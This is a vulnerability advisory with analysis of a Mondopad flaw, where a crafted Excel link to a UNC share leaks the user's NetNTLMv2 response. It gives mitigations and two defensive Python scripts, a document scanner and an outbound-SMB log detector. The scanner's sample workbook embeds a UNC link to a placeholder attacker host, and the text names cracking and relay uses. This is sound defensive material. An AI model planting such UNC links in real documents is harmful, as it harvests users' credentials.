CVE-2017-14971 in Mondopadinfo

Summary

by MITRE

Infocus Mondopad 2.2.08 is vulnerable to a Hashed Credential Disclosure vulnerability. The attacker provides a crafted Microsoft Office document containing a link that has a UNC pathname associated with an attacker-controlled server. In one specific scenario, the attacker provides an Excel spreadsheet, and the attacker-controlled server receives the victim's NetNTLMv2 hash.


Analysis

by VulDB Data Team • 11/23/2019

This vulnerability exists in Infocus Mondopad version 2.2.08, where a Hashed Credential Disclosure flaw lets an attacker obtain authentication material from the device by way of a malicious Microsoft Office document. The weakness is the handling of Universal Naming Convention (UNC) pathnames inside Office documents: a link whose target is a UNC path such as \\server\share\file is followed by the system when the document is opened, and nothing stops that target from being a server the attacker controls. In the scenario MITRE describes, the attacker supplies an Excel spreadsheet containing such a link (an external workbook reference or a hyperlink is enough); opening it on the Mondopad makes the system contact the attacker's server, and the credential disclosure follows from that contact.
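
The following scanner is an added example, not code from VulDB, InFocus or the CVE record, showing how a defender can find such a link before the file is ever opened. OOXML workbooks are zip archives, and every external link or hyperlink is a Relationship element with TargetMode="External" in a .rels part; the script parses each .rels part and reports targets that resolve to a UNC share, whether written as \\host\share or as a file: URI. The sample workbook it builds in memory, the host name attacker.invalid and the benign https hyperlink are constructed for the demonstration.

```python
r"""Find relationship targets in an OOXML document that point at a UNC share.

Office documents (.xlsx/.docx/.pptx) are zip archives; every external link or
hyperlink is a <Relationship TargetMode="External" Target="..."> in a .rels
part. A UNC target is what makes Windows reach for \\host\share, and
authenticate on the way, when the file is opened.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Tuple

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def is_unc_target(target: str) -> bool:
    r"""True if the target resolves to a UNC share in any of the spellings
    Office writes: \\host\share, file:///\\host\share, file://host/share,
    file:////host/share. Drive paths (file:///C:/...) and http(s) are not."""
    t = target.strip()
    if t.startswith("\\\\"):
        return True
    if t.lower().startswith("file:"):
        rest = t[5:].replace("\\", "/")
        if rest.startswith("////"):               # file:////host/share or file:///\\host\share
            return True
        if rest.startswith("//") and not rest.startswith("///"):
            host = rest[2:].split("/", 1)[0]      # file://host/share
            return host not in ("", "localhost")
    return False


def scan_ooxml(data: bytes) -> List[Tuple[str, str]]:
    """Return (rels part, target) for every external relationship with a UNC
    target. Parts that are not well-formed XML are skipped, not trusted."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if is_unc_target(target):
                    hits.append((name, target))
    return hits


def build_sample_xlsx() -> bytes:
    """Constructed stand-in for a crafted workbook, holding only the parts the
    scanner reads: one external-workbook link to a UNC share (the trigger) and
    one ordinary https hyperlink that must not be reported. The host name
    attacker.invalid is a placeholder."""
    ext_link_rels = (
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" TargetMode="External" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLinkPath" '
        'Target="file:///\\\\attacker.invalid\\share\\Book1.xlsx"/>'
        '</Relationships>' % REL_NS
    )
    sheet_rels = (
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" TargetMode="External" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
        'Target="https://example.com/agenda"/>'
        '</Relationships>' % REL_NS
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/externalLinks/_rels/externalLink1.xml.rels", ext_link_rels)
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, target in scan_ooxml(build_sample_xlsx()):
        print(f"UNC target in {part}: {target}")
```

Run it against a real file with scan_ooxml(open(path, "rb").read()); a non-empty result on a document received from outside is reason to quarantine it, because the link fires on open with no macro and no prompt.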

The mechanism is Windows single sign-on: when a Windows host opens a network resource by UNC path, it authenticates to that server automatically with the logged-on user's credentials, and it falls back to NTLM because an attacker's host is not a domain member and cannot be reached with Kerberos. When the victim opens the malicious Excel document and Windows attempts to resolve the UNC path over SMB, the attacker's server issues an NTLM challenge and the client answers with a NetNTLMv2 response computed from the user's NT hash, without prompting the user for anything. This is a classic forced-authentication credential harvesting attack. What the attacker receives is strictly a challenge-response value, not the NT hash itself, a distinction that determines what can be done with it. VulDB classifies the weakness as CWE-310, Cryptographic Issues, for the mishandling of authentication credentials.

The operational impact is significant. A NetNTLMv2 response cannot be passed directly the way an NT hash can, because it is bound to the server challenge that produced it, but the attacker has two uses for it. Offline, every candidate password can be tested against the captured response (hashcat mode 5600), which recovers weak and reused passwords. Online, an attacker who captures the authentication live can relay it to another host that accepts NTLM without requiring signing and act as the victim there (NTLM relay). Either route gives a foothold for lateral movement and privilege escalation. The attack needs no credential entry and shows the user no prompt; the only interaction required is opening the document, which is routine in the enterprise and meeting-room settings where Mondopad units are deployed.

Mitigation should focus on preventing the device from authenticating to hosts the attacker controls. At the network boundary, block outbound SMB (TCP 445 and 139) and WebDAV to the internet, since a meeting-room device has no legitimate reason to speak SMB to arbitrary external hosts; internal segmentation then limits what a rogue host on the LAN can reach. On the host, the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" can be moved from Audit all to Deny all, with named exceptions for servers that genuinely need NTLM, and SMB signing should be required so that a relayed authentication is rejected. Security awareness training should emphasise the danger of opening untrusted Office documents, and network monitoring should alert on outbound SMB connections or NTLM authentication attempts to unexpected destinations. In ATT&CK terms this is Credential Access by Forced Authentication (T1187), not OS Credential Dumping: T1003.001 is LSASS memory dumping, which requires code execution on the victim, whereas here the victim volunteers the authentication over the network. Egress filtering combined with restricting outgoing NTLM is the most effective defense against this attack vector.
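
For the monitoring recommendation above, an added example that is not VulDB's or the vendor's code: a detector over Windows Firewall log records that flags outbound SMB connections from a host to addresses outside the organisation's own ranges, which is the network signature of the forced authentication. The log lines are constructed in the pfirewall.log field layout, and the list of internal networks is an assumption to be replaced with the site's real ranges.

```python
"""Detector for the network signature of a forced NTLM authentication: a host
opening an SMB connection (TCP 445 or 139) to an address outside the ranges
the organisation owns. Input is the Windows Firewall log (pfirewall.log)
layout; the lines below are constructed for the example.
"""
import ipaddress
from typing import Dict, List, Optional

SMB_PORTS = {445, 139}

# Assumption: what counts as "inside". Replace with the site's own ranges. An
# explicit list is used instead of ipaddress's is_private, which also treats
# documentation ranges such as 203.0.113.0/24 as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

FIELDS = ("date", "time", "action", "protocol", "src-ip", "dst-ip", "src-port",
          "dst-port", "size", "tcpflags", "tcpsyn", "tcpack", "tcpwin",
          "icmptype", "icmpcode", "info", "path")


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """One pfirewall.log record as a dict, or None for headers and short lines."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split()
    if len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def find_external_smb(log_text: str) -> List[Dict[str, str]]:
    """Outbound TCP to an SMB port at a non-internal address. DROP records are
    kept too: the connection was blocked, but something on the host tried to
    authenticate outward, which is worth tracing back to a document."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["protocol"] != "TCP" or rec["path"] != "SEND":
            continue
        if not rec["dst-port"].isdigit() or int(rec["dst-port"]) not in SMB_PORTS:
            continue
        if is_internal(rec["dst-ip"]):
            continue
        hits.append({
            "time": f'{rec["date"]} {rec["time"]}',
            "src": rec["src-ip"], "dst": rec["dst-ip"], "port": rec["dst-port"],
            "action": rec["action"],
            "verdict": "credentials likely sent" if rec["action"] == "ALLOW" else "attempt blocked",
        })
    return hits


# Constructed sample: a Mondopad at 10.20.30.40 talks SMB to an internal file
# server, then to two outside hosts (one allowed, one dropped), plus an https
# flow and an inbound SMB flow that must not be reported.
SAMPLE_LOG = """#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2019-11-23 14:02:09 ALLOW TCP 10.20.30.40 10.20.30.5 49810 445 0 - 0 0 0 - - - SEND
2019-11-23 14:02:11 ALLOW TCP 10.20.30.40 203.0.113.7 49812 445 0 - 0 0 0 - - - SEND
2019-11-23 14:02:11 ALLOW TCP 10.20.30.40 203.0.113.7 49813 443 0 - 0 0 0 - - - SEND
2019-11-23 14:02:12 DROP TCP 10.20.30.40 198.51.100.9 49814 139 0 - 0 0 0 - - - SEND
2019-11-23 14:02:15 ALLOW TCP 10.20.30.99 10.20.30.40 50001 445 0 - 0 0 0 - - - RECEIVE
"""


if __name__ == "__main__":
    for hit in find_external_smb(SAMPLE_LOG):
        print(hit)
```

An ALLOW hit means the egress filter recommended above was missing and the NetNTLMv2 response has most likely left the network, so the account's password should be treated as exposed; a DROP hit means the filter worked but the document that triggered the attempt should still be found and removed.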

Reservation

10/01/2017

Disclosure

10/09/2017

Moderation

accepted

CPE

ready

EPSS

0.00222

KEV

no

Activities

very low

Sources
